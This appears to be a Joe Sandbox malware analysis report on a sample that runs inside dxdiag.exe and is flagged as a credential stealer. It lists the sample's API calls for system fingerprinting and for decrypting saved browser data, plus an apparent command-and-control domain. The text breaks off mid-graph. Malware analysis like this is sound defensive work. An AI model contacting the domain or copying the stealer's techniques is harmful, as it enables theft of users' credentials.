                                                                                        2025-01-13 07:34:36 UTC54INData Raw: 33 30 0d 0a 78 31 53 71 74 52 6e 72 38 36 2f 41 63 67 64 6c 7a 43 50 43 78 4e 66 7a 31 35 70 69 34 33 36 6b 4f 2b 65 43 41 30 71 33 48 5a 71 63 43 51 3d 3d 0d 0a
                                                                                        Data Ascii: 30x1SqtRnr86/AcgdlzCPCxNfz15pi436kO+eCA0q3HZqcCQ==
                                                                                        2025-01-13 07:34:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:02:34:22
                                                                                        Start date:13/01/2025
                                                                                        Path:C:\Users\user\Desktop\tesr.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\tesr.exe"
                                                                                        Imagebase:0x7ff79bbb0000
                                                                                        File size:12'735'488 bytes
                                                                                        MD5 hash:4F96B4D0061D45B08D73E3526D82630F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:02:34:23
                                                                                        Start date:13/01/2025
                                                                                        Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                        Imagebase:0xa50000
                                                                                        File size:222'720 bytes
                                                                                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2241070978.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Reset < >
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2169216476.00007FF79BBB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79BBB0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2169196674.00007FF79BBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2169352154.00007FF79BC2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2169352154.00007FF79C62E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2170987736.00007FF79C65A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2171083939.00007FF79C787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2171083939.00007FF79C78A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2171117121.00007FF79C78C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2171134946.00007FF79C792000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff79bbb0000_tesr.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: ae5a398457f13fa23937a4f6b06aecda28dde2fe2fa2895fbf8668ff00ac38b9
                                                                                          • Instruction ID: beb67cf66339755e64787ee0e4264f61f5d90535216bd8dd939ee9a7a3252694
                                                                                          • Opcode Fuzzy Hash: ae5a398457f13fa23937a4f6b06aecda28dde2fe2fa2895fbf8668ff00ac38b9
                                                                                          • Instruction Fuzzy Hash: CC114C22B18B028AEF10EF74E8552B873B4FB59758F841A31EB6E427A4DF78D154C350

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.9%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:68.2%
                                                                                          Total number of Nodes:289
                                                                                          Total number of Limit Nodes:24
                                                                                          execution_graph 13622 42e343 CoSetProxyBlanket 13623 43b781 13624 43b822 13623->13624 13625 43bace 13624->13625 13627 43b480 LdrInitializeThunk 13624->13627 13627->13625 13638 40d6d0 13639 40d760 13638->13639 13641 40d7ae 13639->13641 13642 43b480 LdrInitializeThunk 13639->13642 13642->13641 13643 417e93 13647 417e98 13643->13647 13645 418066 13645->13645 13646 4180e6 13645->13646 13653 41c360 13645->13653 13647->13645 13647->13646 13649 43d6c0 13647->13649 13650 43d6e0 13649->13650 13651 43d80e 13650->13651 13665 43b480 LdrInitializeThunk 13650->13665 13651->13645 13654 41c383 13653->13654 13666 414a40 13654->13666 13665->13651 13667 414a60 13666->13667 13673 43d520 13667->13673 13669 414b7d 13669->13669 13670 43d520 LdrInitializeThunk 13669->13670 13677 439b40 13669->13677 13680 43b480 LdrInitializeThunk 13669->13680 13670->13669 13674 43d540 13673->13674 13675 43d66e 13674->13675 13681 43b480 LdrInitializeThunk 13674->13681 13675->13669 13682 43ca60 13677->13682 13679 439b4a RtlAllocateHeap 13679->13669 13680->13669 13681->13675 13683 43ca80 13682->13683 13683->13679 13683->13683 13684 43bf91 13686 43bef0 13684->13686 13685 43bff7 13686->13685 13689 43b480 LdrInitializeThunk 13686->13689 13688 43c01d 13689->13688 13690 439b90 13691 439bc0 13690->13691 13691->13691 13693 439c2e 13691->13693 13700 43b480 LdrInitializeThunk 13691->13700 13692 439e01 13693->13692 13694 439b40 RtlAllocateHeap 13693->13694 13697 439cb0 13694->13697 13699 439d3e 13697->13699 13701 43b480 LdrInitializeThunk 13697->13701 13702 439b60 13699->13702 13700->13693 13701->13699 13703 439b73 13702->13703 13704 439b75 13702->13704 13703->13692 13705 439b7a RtlFreeHeap 13704->13705 13705->13692 13706 40ce55 13707 40ce70 13706->13707 13710 436f90 13707->13710 13709 40ceb9 13709->13709 13711 436fc0 CoCreateInstance 13710->13711 13713 437181 SysAllocString 13711->13713 13714 437526 13711->13714 13717 4371fe 13713->13717 13715 437536 GetVolumeInformationW 13714->13715 13722 437558 13715->13722 13718 437516 SysFreeString 13717->13718 13719 437206 CoSetProxyBlanket 13717->13719 13718->13714 13720 437226 SysAllocString 13719->13720 13721 43750c 13719->13721 13724 4372f0 13720->13724 13721->13718 13722->13709 13724->13724 13725 437315 SysAllocString 13724->13725 13727 43733c 13725->13727 13726 4374fa SysFreeString SysFreeString 13726->13721 13727->13726 13728 4374f0 13727->13728 13729 437380 VariantInit 13727->13729 13728->13726 13731 4373d0 13729->13731 13730 4374df VariantClear 13730->13728 13731->13730 13732 42c6d7 13733 42c700 13732->13733 13733->13733 13734 42cbd4 GetPhysicallyInstalledSystemMemory 13733->13734 13734->13733 13735 42bfda 13737 42c000 13735->13737 13736 42c0cb FreeLibrary 13738 42c0dd 13736->13738 13737->13736 13739 42c0ed GetComputerNameExA 13738->13739 13740 42c140 GetComputerNameExA 13739->13740 13742 42c210 13740->13742 13743 42b65e 13744 42b679 13743->13744 13747 436c40 13744->13747 13748 436c4e 13747->13748 13750 436d33 13748->13750 13756 43b480 LdrInitializeThunk 13748->13756 13752 42d786 13750->13752 13753 436e1b 13750->13753 13755 43b480 LdrInitializeThunk 13750->13755 13753->13752 13757 43b480 LdrInitializeThunk 13753->13757 13755->13750 13756->13748 13757->13753 13758 434bdc 13759 434bf4 13758->13759 13760 434c09 GetUserDefaultUILanguage 13759->13760 13761 40a960 13764 40a990 13761->13764 13762 40ae26 13763 439b60 RtlFreeHeap 13763->13762 13764->13762 13764->13763 13764->13764 13765 421020 13766 421080 13765->13766 13767 42102e 13765->13767 13771 421140 13767->13771 13769 4210fc 13769->13766 13770 41ef30 RtlAllocateHeap LdrInitializeThunk 13769->13770 13770->13766 13772 421150 13771->13772 13773 43d6c0 LdrInitializeThunk 13772->13773 13774 42121f 13773->13774 13775 43b720 GetForegroundWindow 13779 43d320 13775->13779 13777 43b72e GetForegroundWindow 13778 43b74e 13777->13778 13780 43d330 13779->13780 13780->13777 13781 40ce23 CoInitializeSecurity 13782 43d920 13783 43d940 13782->13783 13786 43d98e 13783->13786 13788 43b480 LdrInitializeThunk 13783->13788 13784 43da2e 13786->13784 13789 43b480 LdrInitializeThunk 13786->13789 13788->13786 13789->13784 13790 43bc65 13791 43bc90 13790->13791 13794 43bcde 13791->13794 13797 43b480 LdrInitializeThunk 13791->13797 13793 43bd6f 13794->13793 13798 43b480 LdrInitializeThunk 13794->13798 13796 43bde7 13797->13794 13798->13796 13799 40e2a9 13805 4097b0 13799->13805 13801 40e2b5 CoUninitialize 13802 40e2e0 13801->13802 13803 40e673 CoUninitialize 13802->13803 13804 40e690 13803->13804 13806 4097c4 13805->13806 13806->13801 13807 4087f0 13809 4087fc 13807->13809 13808 408979 ExitProcess 13809->13808 13810 408811 GetCurrentProcessId GetCurrentThreadId 13809->13810 13811 408974 13809->13811 13813 408851 GetForegroundWindow 13810->13813 13814 40884b 13810->13814 13820 43b400 13811->13820 13815 4088d8 13813->13815 13814->13813 13815->13811 13819 40cdf0 CoInitializeEx 13815->13819 13823 43ca40 13820->13823 13822 43b405 FreeLibrary 13822->13808 13824 43ca49 13823->13824 13824->13822 13825 431bb0 13826 431be5 GetSystemMetrics GetSystemMetrics 13825->13826 13827 431c28 13826->13827 13828 430879 13831 414a30 13828->13831 13830 43087e CoSetProxyBlanket 13831->13830 13832 40ebbc 13833 40ebc5 13832->13833 13862 4233a0 13833->13862 13835 40ebcb 13871 423a00 13835->13871 13837 40ebeb 13877 423d30 13837->13877 13839 40ec0b 13885 425920 13839->13885 13868 4233f0 13862->13868 13863 423797 13863->13863 13864 4234c6 13863->13864 13920 4215f0 13863->13920 13864->13835 13866 423781 GetLogicalDrives 13867 43d6c0 LdrInitializeThunk 13866->13867 13867->13863 13868->13863 13868->13864 13868->13868 13869 43d6c0 LdrInitializeThunk 13868->13869 13870 4235f1 13868->13870 13869->13870 13870->13863 13870->13864 13870->13866 13870->13870 13875 423aa0 13871->13875 13872 423c0f 13938 41eeb0 13872->13938 13874 423cf7 13874->13837 13875->13872 13875->13874 13942 43dfb0 13875->13942 13878 423d3e 13877->13878 13954 43dbd0 13878->13954 13880 423cf7 13880->13839 13881 43dfb0 3 API calls 13883 423ba0 13881->13883 13882 423c0f 13882->13882 13884 41eeb0 3 API calls 13882->13884 13883->13880 13883->13881 13883->13882 13884->13880 13886 425b80 13885->13886 13887 40ec2b 13885->13887 13890 425947 13885->13890 13896 425bc5 13885->13896 13959 43b420 13886->13959 13897 426170 13887->13897 13888 43dfb0 3 API calls 13888->13890 13890->13886 13890->13887 13890->13888 13890->13890 13893 43dbd0 LdrInitializeThunk 13890->13893 13890->13896 13891 43dbd0 LdrInitializeThunk 13891->13896 13893->13890 13895 43b480 LdrInitializeThunk 13895->13896 13896->13887 13896->13891 13896->13895 13968 43dcf0 13896->13968 13978 43e690 13896->13978 13898 426190 13897->13898 13900 4261ee 13898->13900 13992 43b480 LdrInitializeThunk 13898->13992 13899 40ec34 13907 426500 13899->13907 13900->13899 13901 439b40 RtlAllocateHeap 13900->13901 13904 426298 13901->13904 13903 439b60 RtlFreeHeap 13903->13899 13906 42630e 13904->13906 13993 43b480 LdrInitializeThunk 13904->13993 13906->13903 13906->13906 13994 426520 13907->13994 13921 43d520 LdrInitializeThunk 13920->13921 13923 421630 13921->13923 13922 42163c 13922->13864 13923->13922 13924 439b40 RtlAllocateHeap 13923->13924 13925 421674 13924->13925 13933 42172f 13925->13933 13935 43b480 LdrInitializeThunk 13925->13935 13927 421d28 13928 439b60 RtlFreeHeap 13927->13928 13930 421d38 13928->13930 13929 439b40 RtlAllocateHeap 13929->13933 13930->13922 13937 43b480 LdrInitializeThunk 13930->13937 13933->13927 13933->13929 13934 439b60 RtlFreeHeap 13933->13934 13936 43b480 LdrInitializeThunk 13933->13936 13934->13933 13935->13925 13936->13933 13937->13930 13939 41eee0 13938->13939 13939->13939 13940 4215f0 3 API calls 13939->13940 13941 41ef24 13940->13941 13941->13874 13943 43dfd0 13942->13943 13944 43e01e 13943->13944 13952 43b480 LdrInitializeThunk 13943->13952 13945 43e2ac 13944->13945 13947 439b40 RtlAllocateHeap 13944->13947 13945->13875 13949 43e09c 13947->13949 13948 439b60 RtlFreeHeap 13948->13945 13951 43e10e 13949->13951 13953 43b480 LdrInitializeThunk 13949->13953 13951->13948 13952->13944 13953->13951 13955 43dbf0 13954->13955 13956 43dcbf 13955->13956 13958 43b480 LdrInitializeThunk 13955->13958 13956->13883 13958->13956 13960 43b446 13959->13960 13961 43b465 13959->13961 13962 43b45a 13959->13962 13963 43b438 13959->13963 13966 43b44b RtlReAllocateHeap 13960->13966 13965 439b60 RtlFreeHeap 13961->13965 13964 439b40 RtlAllocateHeap 13962->13964 13963->13960 13963->13961 13967 43b460 13964->13967 13965->13967 13966->13967 13967->13896 13969 43dd10 13968->13969 13970 43dd5e 13969->13970 13988 43b480 LdrInitializeThunk 13969->13988 13971 43df9c 13970->13971 13972 439b40 RtlAllocateHeap 13970->13972 13971->13896 13976 43ddf1 13972->13976 13974 439b60 RtlFreeHeap 13974->13971 13975 43de6f 13975->13974 13976->13975 13989 43b480 LdrInitializeThunk 13976->13989 13979 43e69f 13978->13979 13979->13979 13981 43e7ee 13979->13981 13990 43b480 LdrInitializeThunk 13979->13990 13980 43ea97 13980->13896 13981->13980 13983 439b40 RtlAllocateHeap 13981->13983 13984 43e883 13983->13984 13987 43e93e 13984->13987 13991 43b480 LdrInitializeThunk 13984->13991 13985 439b60 RtlFreeHeap 13985->13980 13987->13985 13988->13970 13989->13975 13990->13981 13991->13987 13992->13900 13993->13906 13995 426560 13994->13995 13995->13995 14002 439b90 13995->14002 13999 426696 14000 4265c3 14000->13999 14016 43a3f0 14000->14016 14003 439bc0 14002->14003 14003->14003 14005 439c2e 14003->14005 14024 43b480 LdrInitializeThunk 14003->14024 14004 4265b7 14012 439e30 14004->14012 14005->14004 14006 439b40 RtlAllocateHeap 14005->14006 14009 439cb0 14006->14009 14008 439b60 RtlFreeHeap 14008->14004 14011 439d3e 14009->14011 14025 43b480 LdrInitializeThunk 14009->14025 14011->14008 14013 439f0e 14012->14013 14014 439e42 14012->14014 14013->14000 14014->14013 14026 43b480 LdrInitializeThunk 14014->14026 14018 43a440 14016->14018 14017 43abfe 14017->14000 14023 43a4ae 14018->14023 14027 43b480 LdrInitializeThunk 14018->14027 14020 43ab7a 14020->14017 14028 43b480 LdrInitializeThunk 14020->14028 14022 43b480 LdrInitializeThunk 14022->14023 14023->14017 14023->14020 14023->14022 14023->14023 14024->14005 14025->14011 14026->14013 14027->14023 14028->14017 14029 416b7e 14031 416b90 14029->14031 14030 416d37 CryptUnprotectData 14032 416d56 14030->14032 14031->14030

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 431bb0-431c9c GetSystemMetrics * 2 6 431ca3-432087 0->6
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                                                                          • API String ID: 4116985748-628680385
                                                                                          • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                          • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                                          • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                          • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 9 436f90-436fb8 10 436fc0-437006 9->10 10->10 11 437008-43701f 10->11 12 437020-43705b 11->12 12->12 13 43705d-43709a 12->13 14 4370a0-4370b2 13->14 14->14 15 4370b4-4370cd 14->15 17 4370d7-4370e2 15->17 18 4370cf 15->18 19 4370f0-437122 17->19 18->17 19->19 20 437124-43717b CoCreateInstance 19->20 21 437181-4371b2 20->21 22 437526-437556 call 43ce00 GetVolumeInformationW 20->22 24 4371c0-4371d4 21->24 27 437560-437562 22->27 28 437558-43755c 22->28 24->24 26 4371d6-437200 SysAllocString 24->26 33 437516-437522 SysFreeString 26->33 34 437206-437220 CoSetProxyBlanket 26->34 29 437587-43758e 27->29 28->27 31 437590-437597 29->31 32 4375a7-4375bf 29->32 31->32 35 437599-4375a5 31->35 36 4375c0-4375d4 32->36 33->22 37 437226-43723a 34->37 38 43750c-437512 34->38 35->32 36->36 39 4375d6-43760f 36->39 40 437240-437261 37->40 38->33 41 437610-437650 39->41 40->40 42 437263-4372e3 SysAllocString 40->42 41->41 44 437652-43767f call 41dc20 41->44 43 4372f0-437313 42->43 43->43 45 437315-43733e SysAllocString 43->45 49 437680-437688 44->49 51 437344-437366 45->51 52 4374fa-43750a SysFreeString * 2 45->52 49->49 50 43768a-43768c 49->50 53 437692-4376a2 call 408070 50->53 54 437570-437581 50->54 59 4374f0-4374f6 51->59 60 43736c-43736f 51->60 52->38 53->54 54->29 56 4376a7-4376ae 54->56 59->52 60->59 61 437375-43737a 60->61 61->59 62 437380-4373c8 VariantInit 61->62 63 4373d0-4373e4 62->63 63->63 64 4373e6-4373f4 63->64 65 4373f8-4373fa 64->65 66 437400-437406 65->66 67 4374df-4374ec VariantClear 65->67 66->67 68 43740c-43741a 66->68 67->59 69 437467 68->69 70 43741c-437421 68->70 72 437469-4374a2 call 407ff0 call 408e90 69->72 71 437446-43744a 70->71 73 437430-437438 71->73 74 43744c-437455 71->74 83 4374a4 72->83 84 4374a9-4374b1 72->84 76 43743b-437444 73->76 77 437457-43745a 74->77 78 43745c-437460 74->78 76->71 76->72 77->76 78->76 80 437462-437465 78->80 80->76 83->84 85 4374b3 84->85 86 4374b8-4374db call 408020 call 408000 84->86 85->86 86->67
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                                                                          • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                                                                          • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                                                                          • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                                                                          • VariantInit.OLEAUT32(.'()), ref: 00437385
                                                                                          • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                          • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                                          • API String ID: 2573436264-264043890
                                                                                          • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                          • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                                          • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                          • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 91 4215f0-42163a call 43d520 94 421641-42169e call 414a00 call 439b40 91->94 95 42163c 91->95 101 4216a0-4216a3 94->101 96 421e46-421e56 95->96 102 4216a5-42171a 101->102 103 42171c-421720 101->103 102->101 104 421722-42172d 103->104 105 421734-42174d 104->105 106 42172f 104->106 108 421754-42175f 105->108 109 42174f 105->109 107 4217ec-4217ef 106->107 112 4217f3-4217f8 107->112 113 4217f1 107->113 110 421761-4217d1 call 43b480 108->110 111 4217db-4217e0 108->111 109->111 119 4217d6 110->119 115 4217e2 111->115 116 4217e4-4217e7 111->116 117 4217fe-421808 112->117 118 421d2c-421d65 call 439b60 112->118 113->112 115->107 116->104 120 42180a-42183c 117->120 127 421d67-421d6a 118->127 119->111 122 421842-421868 120->122 123 421a1b-421a1f 120->123 126 42186a-42186d 122->126 125 421a23-421a26 123->125 128 421a28-421a2a 125->128 129 421a2c-421a42 call 439b40 125->129 130 4218aa-4218cf call 421e60 126->130 131 42186f-4218a8 126->131 132 421de3-421de9 127->132 133 421d6c-421de1 127->133 134 421a5a-421a5c 128->134 149 421a46-421a51 129->149 150 421a44-421a58 129->150 130->123 144 4218d5-4218fe 130->144 131->126 137 421deb-421df1 132->137 133->127 142 421a62-421a85 134->142 143 421d0b-421d10 134->143 139 421df3 137->139 140 421df5-421e07 137->140 139->96 145 421e0b-421e11 140->145 146 421e09 140->146 151 421a87-421a8a 142->151 147 421d12-421d16 143->147 148 421d18-421d1a 143->148 152 421900-421903 144->152 153 421e3a-421e3d 145->153 154 421e13-421e38 call 43b480 145->154 146->153 155 421d1c 147->155 148->155 157 421d1e-421d22 149->157 150->134 158 421abb-421af7 151->158 159 421a8c-421ab9 151->159 161 421905-421948 152->161 162 42194a-421968 call 421e60 152->162 165 421e41-421e44 153->165 166 421e3f 153->166 154->153 155->157 157->120 164 421d28-421d2a 157->164 160 421af9-421afc 158->160 159->151 167 421b75-421b79 160->167 168 421afe-421b73 160->168 161->152 176 421977-421994 162->176 177 42196a-421972 162->177 164->118 165->137 166->96 172 421b7b-421b86 167->172 168->160 174 421b88 172->174 175 421b8d-421ba2 172->175 178 421c49-421c50 174->178 179 421ba4 175->179 180 421ba9-421bb4 175->180 181 421996 176->181 182 421998-421a19 call 407ff0 call 414630 call 408000 176->182 177->125 183 421c52 178->183 184 421c54-421c73 178->184 185 421c3a-421c3d 179->185 180->185 186 421bba-421c30 call 43b480 180->186 181->182 182->125 183->184 188 421c75-421c78 184->188 191 421c41-421c44 185->191 192 421c3f 185->192 195 421c35 186->195 193 421caa-421cb0 188->193 194 421c7a-421ca8 188->194 191->172 192->178 197 421cb2-421cb6 193->197 198 421cde-421ce1 193->198 194->188 195->185 200 421cb8-421cbf 197->200 201 421ce3-421cf4 call 439b60 198->201 202 421cf6-421cfc 198->202 205 421cc1-421ccd 200->205 206 421ccf-421cd2 200->206 203 421cfe-421d01 201->203 202->203 203->143 208 421d03-421d09 203->208 205->200 210 421cd4 206->210 211 421cda-421cdc 206->211 208->157 210->211 211->198
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
                                                                                          • API String ID: 0-2322859148
                                                                                          • Opcode ID: ac7828d93f88749587bf053ed3609d6ede44a0fa959ed21f77b42e633a8578f9
                                                                                          • Instruction ID: a9e4235a5477e646960bee548e6a60db3c3433cdc1e43feab013a68861c4041f
                                                                                          • Opcode Fuzzy Hash: ac7828d93f88749587bf053ed3609d6ede44a0fa959ed21f77b42e633a8578f9
                                                                                          • Instruction Fuzzy Hash: 9C32247160C3908FD3248B28D49136FFBE1ABE5314F59492EE5D5873A2D6BD8841CB4B

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 226 40e3e5-40e3e6 223->226 227 40e3fb-40e405 223->227 225 40e3d0-40e3d9 224->225 225->223 225->225 228 40e3f0-40e3f9 226->228 229 40e407-40e40b 227->229 230 40e41b-40e423 227->230 228->227 228->228 231 40e410-40e419 229->231 232 40e425-40e426 230->232 233 40e43b-40e445 230->233 231->230 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 240 40e5c0-40e5d8 238->240 241 40e470-40e47d 239->241 240->240 243 40e5da-40e5fb 240->243 241->241 242 40e47f 241->242 242->238 244 40e600-40e628 243->244 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 259 40e785-40e786 256->259 260 40e79b-40e7a5 256->260 258 40e770-40e779 257->258 258->256 258->258 261 40e790-40e799 259->261 262 40e7a7-40e7ab 260->262 263 40e7bb-40e7c3 260->263 261->260 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 270 40e7f0-40e7f9 268->270 271 40e821-40e948 269->271 272 40e809-40e80b 269->272 270->269 270->270 274 40e950-40e96a 271->274 273 40e810-40e81d 272->273 273->273 275 40e81f 273->275 274->274 276 40e96c-40e98f 274->276 275->271 277 40e990-40e9b9 276->277 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: Uninitialize
                                                                                          • String ID: "# `$,$I~$`~$mutterunurse.click$qx$s
                                                                                          • API String ID: 3861434553-3945163074
                                                                                          • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                          • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                                          • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                          • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 299 423626 287->299 300 42361f-423624 287->300 288->287 289->295 297 4234f7-4234fc 291->297 298 4234fe 291->298 303 423880-42389c 292->303 294->293 295->290 301 423497-42349c 296->301 302 42349e 296->302 305 423500-423537 call 407ff0 297->305 298->305 306 42362d-4236d9 call 407ff0 299->306 300->306 307 4234a1-4234bf call 407ff0 301->307 302->307 303->303 308 42389e-4238ae call 4215f0 303->308 318 423540-423585 305->318 319 4236e0-423724 306->319 307->287 307->288 307->289 307->290 307->291 307->292 307->293 307->294 307->295 314 4238b3-4238b6 308->314 320 4238be-4238db 314->320 318->318 321 423587-42358f 318->321 319->319 322 423726-42372e 319->322 324 4238e0-423904 320->324 325 4235b1-4235bd 321->325 326 423591-423596 321->326 327 423730-423737 322->327 328 423751-423761 322->328 324->324 329 423906-423989 324->329 331 4235e1-4235ec call 43d6c0 325->331 332 4235bf-4235c3 325->332 330 4235a0-4235af 326->330 333 423740-42374f 327->333 334 423763-423767 328->334 335 423781-4237a1 GetLogicalDrives call 43d6c0 328->335 337 423990-4239be 329->337 330->325 330->330 341 4235f1-4235f9 331->341 338 4235d0-4235df 332->338 333->328 333->333 340 423770-42377f 334->340 335->290 335->293 335->294 335->295 335->320 344 